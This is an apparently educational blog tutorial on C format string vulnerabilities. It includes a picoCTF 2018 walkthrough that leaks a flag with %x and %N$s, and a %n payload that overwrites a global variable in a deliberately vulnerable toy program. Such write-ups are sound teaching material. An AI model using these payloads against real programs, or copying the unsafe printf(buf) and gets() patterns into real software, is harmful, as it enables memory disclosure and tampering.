Format String Exploit

One of the most commonly used functions in C is printf(). Its functionality is straightforward and simple – print formatted data. However, even this seemingly simple function can be exploited if programmers are careless. In this post, we’ll look at a vulnerability called the Format String Vulnerability. It lets an attacker leak data from the program stack and, as we’ll see later, even write to memory.

Note: I haven’t worked on this exploit as part of any of my projects. I’ve been able to get a good example from picoCTF 2018, but most of the examples are generic.

The Cause

The syntax of printf() can be checked from its man page (man 3 printf):

int printf(const char *format, ...);

The first argument is a format string followed by a variable number of arguments. We’ve commonly seen printf() being used as

printf ("%d", some_variable);

The string containing %d is called the format string.

When printf() is called on 32-bit x86 (which is what the examples in this post use), its arguments are passed on the stack. On entry to printf(), the first argument (a pointer to the format string) sits 4 bytes above the saved return address, the second argument (the value of some_variable) sits 8 bytes above it, and so on if there are more arguments. This will be obvious to those who understand the program stack structure. If you don’t find this intuitive, I suggest you refresh your knowledge of the program stack.
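To make the "printf() trusts the format string" idea concrete, here is a minimal sketch of a toy formatter. mini_format is a hypothetical name, not a libc function, and it only understands %d and %s. The point is that the callee has no way of knowing how many arguments were really passed; it fetches one for every conversion it finds in the format string.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>

/*
 * mini_format: a toy, hypothetical stand-in for printf() that understands
 * only %d and %s. The format string alone decides how many arguments are
 * fetched and how each one is interpreted.
 * Returns the number of characters stored in out (excluding the '\0').
 */
int mini_format(char *out, size_t size, const char *fmt, ...)
{
    va_list ap;
    size_t used = 0;

    if (size == 0)
        return 0;

    va_start(ap, fmt);
    for (const char *p = fmt; *p != '\0' && used + 1 < size; p++) {
        int n = 0;

        if (*p != '%') {
            out[used++] = *p;           /* ordinary character: copy it */
            continue;
        }
        p++;                            /* look at the conversion letter */
        if (*p == '\0')
            break;                      /* lone '%' at the end: stop */
        if (*p == 'd') {
            /* The format says "int", so an int is fetched, no questions asked. */
            n = snprintf(out + used, size - used, "%d", va_arg(ap, int));
        } else if (*p == 's') {
            /* The format says "string", so the next argument is used as a pointer. */
            n = snprintf(out + used, size - used, "%s", va_arg(ap, const char *));
        } else {
            out[used++] = *p;           /* unknown conversion: copy the character literally */
            continue;
        }
        if (n < 0)
            break;
        /* snprintf() reports the untruncated length, so clamp to the space left. */
        used += ((size_t)n < size - used) ? (size_t)n : size - used - 1;
    }
    va_end(ap);
    out[used] = '\0';
    return (int)used;
}
```

Calling mini_format(out, sizeof out, "%d-%s", 7, "x") leaves "7-x" in out. If the caller passed fewer arguments than the format asks for, va_arg would still fetch something, which is exactly the situation the rest of this post exploits.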

Arbitrary Read

Let’s assume that a programmer called the function as printf (some_variable);

printf() will consider the value in some_variable as the format string. Consider the following program, format_string_vuln.c which echoes the input (ignore buffer overflow):

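#include <stdio.h>

int main (void) {
    char buf[16];
    gets(buf);      /* unsafe: no bounds check on the input */
    printf (buf);   /* vulnerable: user input is used as the format string */
    return 0;
}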

Compilation

nikhilh@ubuntu:~$ gcc -o format_string_vuln format_string_vuln.c
format_string_vuln.c: In function ‘main’:
format_string_vuln.c:5:5: warning: implicit declaration of function ‘gets’; did you mean ‘fgets’? [-Wimplicit-function-declaration]
gets(buf);
^~~~
fgets
format_string_vuln.c:6:13: warning: format not a string literal and no format arguments [-Wformat-security]
printf (buf);
^~~
/tmp/ccYnCPth.o: In function `main':
format_string_vuln.c:(.text+0x24): warning: the `gets' function is dangerous and should not be used.

Finding the Connection

nikhilh@ubuntu:~$ ./format_string_vuln
AAAA
AAAA

nikhilh@ubuntu:~$ ./format_string_vuln
%x %x %x
b7f6f000 b7f6d244 b7dd50ec

Do those numbers look familiar? Don’t they look like something you’d find on the program stack?

nikhilh@ubuntu:~$ gdb -q format_string_vuln
Reading symbols from format_string_vuln...(no debugging symbols found)...done.
(gdb) disas main
Dump of assembler code for function main:
0x0804849b : lea 0x4(%esp),%ecx
0x0804849f : and $0xfffffff0,%esp
0x080484a2 : pushl -0x4(%ecx)
...
...
0x080484cc : push %eax
0x080484cd : call 0x8048350
0x080484d2 : add $0x10,%esp
...
...
0x080484f2 : ret
End of assembler dump.

(gdb) b * 0x080484cd
Breakpoint 1 at 0x80484cd

(gdb) r
Starting program: /home/nikhilh/format_string_vuln
A
Breakpoint 1, 0x080484cd in main ()

(gdb) x/4xw $esp
0xbfffef60: 0xbfffef7c 0xb7fba000 0xb7fb8244 0xb7e200ec

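The stack data is being leaked! The first word, 0xbfffef7c, is the argument we actually passed: the address of buf. The three words after it end in the same digits (000, 244, 0ec) as the values printed by %x %x %x earlier. The upper digits differ from run to run, presumably because the libraries are loaded at a different base address each time.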

If the format string contains format specifiers, printf() expects a matching argument for each one in the call. If the programmer doesn’t supply them, printf() still reads from where the arguments would have been: 8 bytes above the return address, then 12, and so on. It ends up reading whatever data happens to be on the stack.
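For contrast, here is a minimal sketch of the safe pattern. The helper name echo_safe is my own, and it writes into a buffer with snprintf() so the result is easy to inspect. Because the format string is the constant "%s", any % characters in the input are treated as plain data.

```c
#include <stddef.h>
#include <stdio.h>

/*
 * echo_safe: copy user input into out using a constant "%s" format.
 * Any '%' characters in input are copied verbatim, never interpreted.
 * Returns what snprintf() returns: the length of input, barring errors.
 */
int echo_safe(char *out, size_t size, const char *input)
{
    return snprintf(out, size, "%s", input);
}
```

In the echo program above, the equivalent change would be printf("%s", buf) or fputs(buf, stdout) instead of printf(buf). With that change, typing %x %x %x simply prints %x %x %x back.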

Hack It!

I came across a format string vulnerability based problem in picoCTF 2018. Consider the following snippets from the file, echo.c:

...
int main(int argc, char **argv) {
    setvbuf(stdout, NULL, _IONBF, 0);

    char buf[64];
    char flag[64];
    char *flag_ptr = flag;
...
...
    FILE *file = fopen("flag.txt", "r");
    if (file == NULL) {
        printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
        exit(0);
    }
...
...
    fgets(flag, sizeof(flag), file);
    while(1) {
        printf("> ");
        fgets(buf, sizeof(buf), stdin);
        printf(buf);
    }

    return 0;
}

We can clearly see the vulnerability:

printf(buf);

The character array flag is present on the program stack, and so is flag_ptr, which holds its address. If we can get printf() to print the values on the stack, we can use trial-and-error to find one that points to flag and read its contents.
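Picking out one particular stack slot is done with the positional form of a conversion, %N$, which is a POSIX extension (supported by glibc) that selects the N-th argument instead of the next one. Here is a minimal sketch with a legitimate call, where both arguments really exist. The function name pick_args is an assumption of mine.

```c
#include <stddef.h>
#include <stdio.h>

/*
 * pick_args: use the POSIX "%N$" syntax to select arguments by position
 * rather than in order. "%2$s" prints the second argument after the
 * format string, "%1$s" prints the first.
 */
int pick_args(char *out, size_t size, const char *first, const char *second)
{
    return snprintf(out, size, "%2$s %1$s", first, second);
}
```

pick_args(out, sizeof out, "one", "two") produces "two one". In the vulnerable program there are no real arguments, so %8$s means "treat the eighth word above the format string pointer as a char * and print the string it points to".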

nikel@pico-2018-shell-1:~$ nc 2018shell1.picoctf.com 46960
Time to learn about Format Strings!
We will evaluate any format string you give us with printf().
See if you can get the flag!

> %x %x %x %x %x %x %x %x %x %x %x
40 f771c5a0 8048647 f7753a74 1 f772b490 ffe41f34 ffe41e3c 493 88d4008 25207825

> %x %x %x %x %x %x %x %x %x %x
40 f771c5a0 8048647 f7753a74 1 f772b490 ffe41f34 ffe41e3c 493 88d4008

> %2$s
uuppppppa

> %4$s
`r

> %6$s
Xii

> %7$s
.

> %8$s
picoCTF{foRm4t_stRinGs_aRe_DanGer0us_a7bc4a2d}

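Notice that I’ve tried only those values that look like pointers into mapped memory (the ones starting with f77 and ffe), since %s dereferences whatever value it is given. Small values such as 0x40 or 0x1 are not valid addresses, and trying them would most likely crash the program. There’s no point in trying addresses such as 0x8048647 either, because that is obviously not an auto variable’s address. The eighth value, 0xffe41e3c, turned out to point to flag.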
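One more detail from the first leak is worth decoding. The eleventh value, 25207825, does not look like an address at all. Assuming a little-endian x86 target (which the addresses suggest), a minimal sketch like the following splits a leaked word into the bytes it occupies in memory. The helper name word_to_bytes is hypothetical.

```c
#include <stdint.h>

/*
 * word_to_bytes: split a 32-bit value printed by %x into the four bytes
 * it occupies in memory on a little-endian machine (least significant
 * byte first). out must have room for 5 chars, including the '\0'.
 */
void word_to_bytes(uint32_t word, char out[5])
{
    for (int i = 0; i < 4; i++)
        out[i] = (char)((word >> (8 * i)) & 0xff);
    out[4] = '\0';
}
```

word_to_bytes(0x25207825, s) gives the four characters "%x %", which is the beginning of the very input we typed. In other words, by the eleventh %x, printf() has walked far enough up the stack to reach buf itself.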

Imagine if a critical system password was stored in the flag variable. That would be a disaster, wouldn’t it?

Arbitrary Write

We’ve seen an example of an arbitrary read. But what can be worse than an arbitrary read? An arbitrary write.

Well, almost arbitrary. We need to know the address we want to write to, and we need to get that address onto the stack where printf() will find it. It is not difficult to imagine how corrupting a certain variable’s value would allow a cybercriminal to reach code in an unauthorized manner.

Consider the following code snippet from format_string_vuln.c:

...
int flag;

int main (void) {
    char buf[16];
    flag = 0;

    gets(buf);
    printf (buf);

    if (flag)
        printf("You reached me!\n");

    return 0;
}

The variable flag lives in the bss memory segment because it is a global without an initializer. If it were initialized to a nonzero value, it would live in the data memory segment instead. Let’s assume that under normal circumstances, the if block is inaccessible. The cybercriminal’s aim would be to enter the if block.

Compilation

nikhilh@ubuntu:~$ gcc -fno-stack-protector -o format_string_vuln format_string_vuln.c
format_string_vuln.c: In function ‘main’:
format_string_vuln.c:9:5: warning: implicit declaration of function ‘gets’ [-Wimplicit-function-declaration]
gets(buf);
^
format_string_vuln.c:10:13: warning: format not a string literal and no format arguments [-Wformat-security]
printf (buf);
^
/tmp/ccgUZTWo.o: In function `main':
format_string_vuln.c:(.text+0x23): warning: the `gets' function is dangerous and should not be used.

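Notice the usage of the -fno-stack-protector flag. The format string write itself targets flag, which is not on the stack, so it doesn’t disturb the stack canary. The problem is gets(): a payload longer than 15 characters doesn’t fit in the 16-byte buf, so gets() writes past its end and can overwrite the canary. Without the flag, such a payload ends in a stack smashing detected error, as in this run against a build with the stack protector enabled: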

nikhilh@ubuntu:~$ python -c "print ('\x2c\xa0\x04\x08' + '%x '*4 + '%x ')" | ./format_string_vuln
*** stack smashing detected ***: ./format_string_vuln terminated
,�b7f9b000 b7f99244 b7e010ec 1 1 Aborted (core dumped)

Finding the Connection

At this point, we know that values can be read off the stack. In this case, we need to write to a specific address, i.e., the address of the variable flag. Our aim is to place the address of flag on the stack and use the %n format specifier to write to it.

But how do we find the address of flag? objdump to the rescue!

nikhilh@ubuntu:~$ objdump -t format_string_vuln | grep flag
0804a028 g O .bss 00000004 flag

The -t flag displays the contents of the symbol table.

We now know the address to which we are going to write. We need to find a way to get it on the stack. This is easy and intuitive. Our input is stored in buf, and buf is a local variable, so it lives on the stack. If we put the address at the start of our input, it’ll be sitting on the stack a few words above printf()’s arguments. This should be obvious to those who understand the C function call mechanism.

If we form a format string which consists of multiple %x and the address of flag, the program is bound to output the address of flag back to us at some point. This follows the concept of arbitrary read that we discussed before.

nikhilh@ubuntu:~$ python -c "print ('\x28\xa0\x04\x08' + '%x '*3)" | ./format_string_vuln
(�1 b7d9ca50 804851b

nikhilh@ubuntu:~$ python -c "print ('\x28\xa0\x04\x08' + '%x '*4)" | ./format_string_vuln
(�1 b7e28a50 804851b 804a028
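The payload in these runs is just the address of flag in little-endian byte order followed by a number of %x specifiers. Here is a minimal sketch of building the same bytes in C. The name build_payload and its parameters are my own, for illustration only. One reason to build the bytes explicitly is that the python one-liners above rely on Python 2 byte strings; under Python 3, print() would encode \xa0 as two UTF-8 bytes and corrupt the address.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * build_payload: write a 32-bit address in little-endian order, followed
 * by `pops` copies of "%x " and then the string `tail`, into out.
 * Returns the payload length in bytes, or 0 if out is too small.
 * The name and signature are illustrative, not from any library.
 */
size_t build_payload(unsigned char *out, size_t size, uint32_t addr,
                     unsigned pops, const char *tail)
{
    size_t tail_len = strlen(tail);
    size_t need = 4 + 3 * (size_t)pops + tail_len;
    size_t pos = 4;

    if (need + 1 > size)                /* +1 for the terminating '\0' */
        return 0;

    /* Least significant byte first, as x86 stores it in memory. */
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)((addr >> (8 * i)) & 0xff);

    for (unsigned i = 0; i < pops; i++) {
        memcpy(out + pos, "%x ", 3);
        pos += 3;
    }
    memcpy(out + pos, tail, tail_len);
    pos += tail_len;
    out[pos] = '\0';
    return pos;
}
```

build_payload(p, sizeof p, 0x0804a028, 4, "") reproduces the 16-byte probe from the second run; the bytes would then be written to the target's standard input with fwrite(). Passing "%n " as tail with three pops gives the shape of payload used for the actual write.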

Hack It!

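We’ll use the %n format specifier to write to the target address. Instead of printing anything, %n stores the number of characters printed so far into the int that its argument points to. We need to ensure that %n corresponds to the address of flag. The fourth value on the stack is the address of flag, so we use '%x '*3 to consume the first three values, and the %n that follows will write to flag.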

nikhilh@ubuntu:~$ python -c "print ('\x28\xa0\x04\x08' + '%x '*3 + '%n ')" | ./format_string_vuln
(�1 b7e1ea50 804851b You reached me!

We entered the if block! If that block had critical code which executed based on the correctness of a value, this exploit would cause havoc.
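A harmless way to watch %n at work is to use it with a literal format string and a real int to receive the count. This is a minimal sketch; chars_before_n is a name I made up.

```c
#include <stddef.h>
#include <stdio.h>

/*
 * chars_before_n: format `prefix` followed by %n and return the value
 * that %n stored, i.e. the number of characters produced before it.
 * The format string is a literal here, so this is a legitimate use of %n.
 */
int chars_before_n(char *out, size_t size, const char *prefix)
{
    int count = -1;

    snprintf(out, size, "%s%n", prefix, &count);
    return count;
}
```

chars_before_n(out, sizeof out, "AAAA") returns 4. In the exploit, printf() has already emitted the four address bytes and three hexadecimal values with their spaces by the time it reaches %n (about 23 characters in the run above), so a nonzero value lands in flag and the if condition becomes true.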

Done!

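Format string exploits like these are not stopped by DEP, because they don’t involve execution of any shellcode on the stack. ASLR doesn’t help here either: in a non-PIE binary such as this one, the bss, data and text memory segments are loaded at fixed addresses. (In a position-independent executable, these segments are randomized as well, and the address of flag would first have to be leaked.) However, these bugs are very easy to detect. The compiler warned us about printf (buf) in both builds above.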

I suspect that these vulnerabilities are rare today, but you never know when you’ll come across one. It is important for budding security engineers to understand the past, so that they can avoid repeating the mistake and also help others.

Thank you for reading! If you have any questions, please leave them in the comments section below and I’ll get back to you as soon as I can!
